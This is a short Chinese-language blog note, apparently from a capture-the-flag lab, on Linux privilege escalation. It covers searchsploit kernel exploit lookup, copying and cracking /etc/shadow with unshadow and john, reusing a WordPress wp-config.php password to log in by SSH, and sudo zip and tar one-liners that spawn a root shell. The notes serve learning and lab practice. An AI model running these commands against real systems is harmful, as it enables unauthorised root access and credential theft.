目录遍历(提权root权限)web安全提权
内核漏洞提权:
查看发行版本:/etc/issue、/etc/*-release、uname -a
如:searchsploit Ubuntu 12.04.5 查找载荷
如果有合适的载荷,则可以进行内核溢出,否则不行
提权方法一:破解linux用户密码步骤:
获取到/etc/passwd、/etc/shadow到本地。通常meterpreter的download命令可以下载这两个文件
unshadow passwd shadow > cracked
john craked
至此,完成用户密码破解
提权方法二:(我并不常用,掌握的不好)利用用户的定时任务
提权方法三:密码复用,找到一些配置文件,查看是否有密码
www-data这个低权限用户,通过弱口令,没有猜测成功。
低权限用户执行sudo -l 进行提权,需要密码,这时我们需要考虑浏览机器上有哪些web应用
在/home目录下有个zico用户目录
发现这个目录下有wordpress目录
如找到wordpress应用,尝试找到这个应用的配置文件wp-config.php,里面有可能用户名和密码 #密码复用:数据库与系统一个密码
可以用这个用户和密码,利用ssh远程登录靶机
ssh zico@10.10.10.141
使用sudo -l 查看当前用户可以使用root提权的命令信息
发现zip tar命令是有root权限的,且不用密码
则利用如下步骤题提权:
方法一:zip
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"执行后可以提升到root权限
方法二:tar
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
6158
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
